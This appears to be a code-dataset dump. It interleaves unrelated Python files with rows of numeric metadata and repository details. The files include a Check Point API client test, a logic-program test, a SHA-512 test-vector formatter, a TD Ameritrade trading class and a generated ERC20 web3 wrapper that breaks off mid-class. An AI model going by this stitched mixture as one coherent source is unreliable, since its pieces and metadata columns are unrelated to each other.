(64, 32, [{'DESC': 'bar'}], 'uid'),
])
def test_show_all(core_client, mgmt_server_base_uri,
limit, offset, order, details_level):
resources = [ "show-services-tcp", "show-services-udp",
"show-services-sctp", "show-services-other",
"show-service-groups", "show-services-dce-rpc",
"show-services-rpc" ]
with responses.RequestsMock() as rsps:
resp_body = {'foo': 'bar', 'message': 'OK'}
for resource in resources:
endpoint = mgmt_server_base_uri + resource
rsps.add(responses.POST, endpoint,
json=resp_body, status=200,
content_type='application/json')
s = cpauto.ServiceTCP(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceUDP(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceSCTP(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceOther(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceGroup(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceDCERPC(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
s = cpauto.ServiceRPC(core_client)
r = s.show_all(limit=limit, offset=offset,
order=order, details_level=details_level)
assert r.status_code == 200
assert r.json() == resp_body
| 33.433544
| 75
| 0.589494
| 1,317
| 10,565
| 4.577069
| 0.069096
| 0.081287
| 0.079628
| 0.069675
| 0.855508
| 0.846218
| 0.83079
| 0.823822
| 0.818182
| 0.818182
| 0
| 0.017649
| 0.276006
| 10,565
| 315
| 76
| 33.539683
| 0.770428
| 0.005963
| 0
| 0.79661
| 0
| 0
| 0.102801
| 0.009242
| 0
| 0
| 0
| 0
| 0.29661
| 1
| 0.021186
| false
| 0
| 0.012712
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dd68549a483a60d2a06df1cfc83d73d0e4119a74
| 179
|
py
|
Python
|
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.12.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
p :- not q.
q :- r.
r :- q.
s :- p.
t :- not s.
l :- u.
u :- t.
"""
output = """
p :- not q.
q :- r.
r :- q.
s :- p.
t :- not s.
l :- u.
u :- t.
"""
| 8.52381
| 12
| 0.284916
| 34
| 179
| 1.5
| 0.294118
| 0.156863
| 0.196078
| 0.235294
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0
| 0
| 0.402235
| 179
| 20
| 13
| 8.95
| 0.476636
| 0
| 0
| 0.888889
| 0
| 0
| 0.809816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
dd71ef357bd148e940782eb95a70b38cb38d99bd
| 35
|
py
|
Python
|
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
Test_Carlos_PuertoG.py
|
Sergio95480/Laboratorio
|
25c0d86dac48ce1e9b7ce9ec571241b0c5f80ba2
|
[
"MIT"
] | null | null | null |
def suma (x,y):
return x + y
| 7
| 16
| 0.485714
| 7
| 35
| 2.428571
| 0.714286
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.371429
| 35
| 4
| 17
| 8.75
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
06b9580429e56f38e59672d6646ed56e82b296cc
| 1,587
|
py
|
Python
|
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
tests/test_generation/make_nist_sha512.py
|
colelawrence/orion
|
5554a09fa408552626baa132176da3852afded86
|
[
"MIT"
] | null | null | null |
lines = []
with open('src/tests/test_data/original/SHA512LongMsg.rsp') as infile:
outfile = open('src/tests/test_data/SHA512LongMsg_fmt.txt', 'w')
test_case_number = 0
# 128 is important. This is the total number of tests cases.
outfile.write("let test_vectors: [[&str; 2]; 128] = [ ")
for line in infile:
lines.append(line)
if line.startswith("MD ="):
test_case_number += 1
data = (lines[-2].split(" = "))[1].rstrip()
digest = (lines[-1].split(" = "))[1].rstrip()
# Below is a single test case
single_test_case = ("\n[\"%s\", \"%s\"],\n" % (data, digest))
outfile.write(single_test_case)
outfile.write("\n];") #Finish off the array
outfile.close()
print(test_case_number)
# Empty list
lines[:] = []
with open('src/tests/test_data/original/SHA512ShortMsg.rsp') as infile:
outfile = open('src/tests/test_data/SHA512ShortMsg_fmt.txt', 'w')
test_case_number = 0
# 129 is important. This is the total number of tests cases.
outfile.write("let test_vectors: [[&str; 2]; 129] = [ ")
for line in infile:
lines.append(line)
if line.startswith("MD ="):
test_case_number += 1
data = (lines[-2].split(" = "))[1].rstrip()
digest = (lines[-1].split(" = "))[1].rstrip()
# Below is a single test case
single_test_case = ("\n[\"%s\", \"%s\"],\n" % (data, digest))
outfile.write(single_test_case)
outfile.write("\n];") #Finish off the array
outfile.close()
print(test_case_number)
| 31.117647
| 73
| 0.589162
| 212
| 1,587
| 4.278302
| 0.268868
| 0.105843
| 0.092613
| 0.070562
| 0.91731
| 0.91731
| 0.91731
| 0.868798
| 0.787211
| 0.703418
| 0
| 0.031483
| 0.239445
| 1,587
| 50
| 74
| 31.74
| 0.719967
| 0.141147
| 0
| 0.75
| 0
| 0
| 0.226499
| 0.130274
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
06ba7d6c171d338094e19b3587564c72701945cd
| 5,053
|
py
|
Python
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 6
|
2020-12-27T00:27:55.000Z
|
2021-03-20T23:56:12.000Z
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 2
|
2021-01-07T16:26:52.000Z
|
2021-01-12T19:25:57.000Z
|
resources/Stock/stock.py
|
SamGulinello/TraderPy
|
651c0d04b5680c192f1098c8bb57cd2b57798ec0
|
[
"MIT"
] | 2
|
2020-12-28T15:04:35.000Z
|
2021-08-20T20:54:49.000Z
|
# TraderPY Stock Class
#
# Written By Sam Gulinello
# MIT Licensed
#
# For More Information About This Project Go to
# https://github.com/SamGulinello/TraderPY
import requests
from config.config import config
client_id = config["client_id"]
# Each ticker will be converted to a stock object
class Stock():
def __init__(self,ticker):
self.ticker = ticker
def getCurrentPrice(self):
# Get ticker value
ticker = self.ticker
print("grabbing current price of " + ticker)
# Define the endpoint
endpoint = "https://api.tdameritrade.com/v1/marketdata/{}/pricehistory".format(ticker)
# Define the payload
payload = {'apikey':client_id,
'periodType':'day',
'freqencyType':'minute',
'frequency':'1',
'period':'1',
'needExtendedHoursData':'true'}
# Send the request and recieve data
content = requests.get(url=endpoint, params=payload)
# Convert the data into a list of prices
data = content.json()
data = data['candles']
data = data[-1]
currentPrice = data['close']
self.currentPrice = currentPrice
print("Current Price: " + str(currentPrice))
return(currentPrice)
# Method to determine and return the 10 day average stock price of a company
def tenDayAverage(self):
# Get ticker value
ticker = self.ticker
#print("grabbing ten day average of " + ticker)
# Define the endpoint
endpoint = "https://api.tdameritrade.com/v1/marketdata/{}/pricehistory".format(ticker)
# Define the payload
payload = {'apikey':client_id,
'periodType':'day',
'freqencyType':'minute',
'frequency':'1',
'period':'10',
'needExtendedHoursData':'true'}
# Send the request and recieve data
content = requests.get(url=endpoint, params=payload)
# Convert the data into a list of prices
data = content.json()
data = data['candles']
# Average the values of all the prices
averagePrice = 0
for i in data:
openPrice = i['open']
averagePrice = averagePrice + openPrice
averagePrice = averagePrice / len(data)
# print("Ten Day Average: " + str(averagePrice))
return averagePrice
def thirtyDayAverage(self):
# Get ticker value
ticker = self.ticker
#print("grabbing thirty day average of " + ticker)
# Define the endpoint
endpoint = "https://api.tdameritrade.com/v1/marketdata/{}/pricehistory".format(ticker)
# Define the payload
payload = {'apikey':client_id,
'periodType':'month',
'freqencyType':'minute',
'frequency':'1',
'period':'1',
'needExtendedHoursData':'true'}
# Send the request and recieve the data
content = requests.get(url=endpoint, params=payload)
# Convert the data into a list of prices
data = content.json()
data = data['candles']
# Average the values of all the prices
averagePrice = 0
for i in data:
openPrice = i['open']
averagePrice = averagePrice + openPrice
averagePrice = averagePrice / len(data)
# print("Thirty day average: " + str(averagePrice))
return averagePrice
def buyStock(self,quantity,account_id,headers):
# define our headers
header = headers
# define the endpoint for Saved orders, including your account ID
endpoint = r"https://api.tdameritrade.com/v1/accounts/{}/orders".format(account_id)
# define the payload, in JSON format
payload = {'orderType':'MARKET',
'session':'NORMAL',
'duration':'DAY',
'orderStrategyType':'SINGLE',
'orderLegCollection':[{'instruction':'Buy','quantity':quantity,'instrument':{'symbol':self.ticker,'assetType':'EQUITY'}}]}
# Send the request
requests.post(url = endpoint, json = payload, headers = header)
def sellStock(self,quantity,account_id,headers):
# define our headers
header = headers
# define the endpoint for Saved orders, including your account ID
endpoint = r"https://api.tdameritrade.com/v1/accounts/{}/orders".format(account_id)
# define the payload, in JSON format
payload = {'orderType':'MARKET',
'session':'NORMAL',
'duration':'DAY',
'orderStrategyType':'SINGLE',
'orderLegCollection':[{'instruction':'Sell','quantity':quantity,'instrument':{'symbol':self.ticker,'assetType':'EQUITY'}}]}
# Send the request
requests.post(url = endpoint, json = payload, headers = header)
| 31.779874
| 139
| 0.578072
| 505
| 5,053
| 5.758416
| 0.259406
| 0.030949
| 0.030949
| 0.039546
| 0.809491
| 0.809491
| 0.809491
| 0.777854
| 0.777854
| 0.729367
| 0
| 0.004905
| 0.314071
| 5,053
| 158
| 140
| 31.981013
| 0.834103
| 0.240451
| 0
| 0.730769
| 0
| 0
| 0.227811
| 0.016592
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.025641
| 0
| 0.141026
| 0.025641
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
06cbed5ac8b374d402ed5268cd4b938ec0ce65e8
| 183,683
|
py
|
Python
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 30
|
2021-10-31T13:17:58.000Z
|
2022-02-04T13:41:13.000Z
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 36
|
2021-11-03T20:30:38.000Z
|
2022-02-14T10:15:40.000Z
|
thirdweb/abi/token_erc20.py
|
nftlabs/nftlabs-sdk-python
|
ea533142dc0881872b347cd8ce635dc0bfff3153
|
[
"Apache-2.0"
] | 10
|
2021-11-10T19:59:41.000Z
|
2022-01-21T21:26:55.000Z
|
"""Generated wrapper for TokenERC20 Solidity contract."""
# pylint: disable=too-many-arguments
import json
from typing import ( # pylint: disable=unused-import
Any,
List,
Optional,
Tuple,
Union,
)
from eth_utils import to_checksum_address
from mypy_extensions import TypedDict # pylint: disable=unused-import
from hexbytes import HexBytes
from web3 import Web3
from web3.contract import ContractFunction
from web3.datastructures import AttributeDict
from web3.providers.base import BaseProvider
from zero_ex.contract_wrappers.bases import ContractMethod, Validator
from zero_ex.contract_wrappers.tx_params import TxParams
# Try to import a custom validator class definition; if there isn't one,
# declare one that we can instantiate for the default argument to the
# constructor for TokenERC20 below.
try:
# both mypy and pylint complain about what we're doing here, but this
# works just fine, so their messages have been disabled here.
from . import ( # type: ignore # pylint: disable=import-self
TokenERC20Validator,
)
except ImportError:
class TokenERC20Validator(Validator): # type: ignore
"""No-op input validator."""
try:
from .middleware import MIDDLEWARE # type: ignore
except ImportError:
pass
class ITokenERC20MintRequest(TypedDict):
"""Python representation of a tuple or struct.
Solidity compiler output does not include the names of structs that appear
in method definitions. A tuple found in an ABI may have been written in
Solidity as a literal, anonymous tuple, or it may have been written as a
named `struct`:code:, but there is no way to tell from the compiler
output. This class represents a tuple that appeared in a method
definition. Its name is derived from a hash of that tuple's field names,
and every method whose ABI refers to a tuple with that same list of field
names will have a generated wrapper method that refers to this class.
Any members of type `bytes`:code: should be encoded as UTF-8, which can be
accomplished via `str.encode("utf_8")`:code:
"""
to: str
primarySaleRecipient: str
quantity: int
price: int
currency: str
validityStartTimestamp: int
validityEndTimestamp: int
uid: Union[bytes, str]
class ERC20VotesUpgradeableCheckpoint(TypedDict):
"""Python representation of a tuple or struct.
Solidity compiler output does not include the names of structs that appear
in method definitions. A tuple found in an ABI may have been written in
Solidity as a literal, anonymous tuple, or it may have been written as a
named `struct`:code:, but there is no way to tell from the compiler
output. This class represents a tuple that appeared in a method
definition. Its name is derived from a hash of that tuple's field names,
and every method whose ABI refers to a tuple with that same list of field
names will have a generated wrapper method that refers to this class.
Any members of type `bytes`:code: should be encoded as UTF-8, which can be
accomplished via `str.encode("utf_8")`:code:
"""
fromBlock: int
votes: int
class DefaultAdminRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the DEFAULT_ADMIN_ROLE method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class DomainSeparatorMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the DOMAIN_SEPARATOR method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class AllowanceMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the allowance method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, owner: str, spender: str):
"""Validate the inputs to the allowance method."""
self.validator.assert_valid(
method_name="allowance",
parameter_name="owner",
argument_value=owner,
)
owner = self.validate_and_checksum_address(owner)
self.validator.assert_valid(
method_name="allowance",
parameter_name="spender",
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
return (owner, spender)
def call(
self, owner: str, spender: str, tx_params: Optional[TxParams] = None
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(owner, spender).call(
tx_params.as_dict()
)
return int(returned)
def send_transaction(
self, owner: str, spender: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).transact(
tx_params.as_dict()
)
def build_transaction(
self, owner: str, spender: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, owner: str, spender: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(owner, spender) = self.validate_and_normalize_inputs(owner, spender)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(owner, spender).estimateGas(
tx_params.as_dict()
)
class ApproveMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the approve method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, spender: str, amount: int):
"""Validate the inputs to the approve method."""
self.validator.assert_valid(
method_name="approve",
parameter_name="spender",
argument_value=spender,
)
spender = self.validate_and_checksum_address(spender)
self.validator.assert_valid(
method_name="approve",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (spender, amount)
def call(
self, spender: str, amount: int, tx_params: Optional[TxParams] = None
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(spender, amount).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self, spender: str, amount: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self, spender: str, amount: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, spender: str, amount: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(spender, amount) = self.validate_and_normalize_inputs(spender, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(spender, amount).estimateGas(
tx_params.as_dict()
)
class BalanceOfMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the balanceOf method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str):
"""Validate the inputs to the balanceOf method."""
self.validator.assert_valid(
method_name="balanceOf",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return account
def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).transact(tx_params.as_dict())
def build_transaction(
self, account: str, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account) = self.validate_and_normalize_inputs(account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account).estimateGas(
tx_params.as_dict()
)
class BurnMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burn method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, amount: int):
"""Validate the inputs to the burn method."""
self.validator.assert_valid(
method_name="burn",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return amount
def call(self, amount: int, tx_params: Optional[TxParams] = None) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(amount).call(tx_params.as_dict())
def send_transaction(
self, amount: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).transact(tx_params.as_dict())
def build_transaction(
self, amount: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, amount: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(amount) = self.validate_and_normalize_inputs(amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(amount).estimateGas(tx_params.as_dict())
class BurnFromMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burnFrom method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, amount: int):
"""Validate the inputs to the burnFrom method."""
self.validator.assert_valid(
method_name="burnFrom",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="burnFrom",
parameter_name="amount",
argument_value=amount,
)
# safeguard against fractional inputs
amount = int(amount)
return (account, amount)
def call(
self, account: str, amount: int, tx_params: Optional[TxParams] = None
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(account, amount).call(tx_params.as_dict())
def send_transaction(
self, account: str, amount: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).transact(
tx_params.as_dict()
)
def build_transaction(
self, account: str, amount: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, amount: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account, amount) = self.validate_and_normalize_inputs(account, amount)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, amount).estimateGas(
tx_params.as_dict()
)
class CheckpointsMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the checkpoints method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, account: str, pos: int):
"""Validate the inputs to the checkpoints method."""
self.validator.assert_valid(
method_name="checkpoints",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="checkpoints",
parameter_name="pos",
argument_value=pos,
)
return (account, pos)
def call(
self, account: str, pos: int, tx_params: Optional[TxParams] = None
) -> ERC20VotesUpgradeableCheckpoint:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, pos) = self.validate_and_normalize_inputs(account, pos)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(account, pos).call(
tx_params.as_dict()
)
return ERC20VotesUpgradeableCheckpoint(
fromBlock=returned[0],
votes=returned[1],
)
def send_transaction(
self, account: str, pos: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, pos) = self.validate_and_normalize_inputs(account, pos)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, pos).transact(
tx_params.as_dict()
)
def build_transaction(
self, account: str, pos: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, pos) = self.validate_and_normalize_inputs(account, pos)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, pos).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, pos: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account, pos) = self.validate_and_normalize_inputs(account, pos)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, pos).estimateGas(
tx_params.as_dict()
)
class ContractTypeMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractType method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
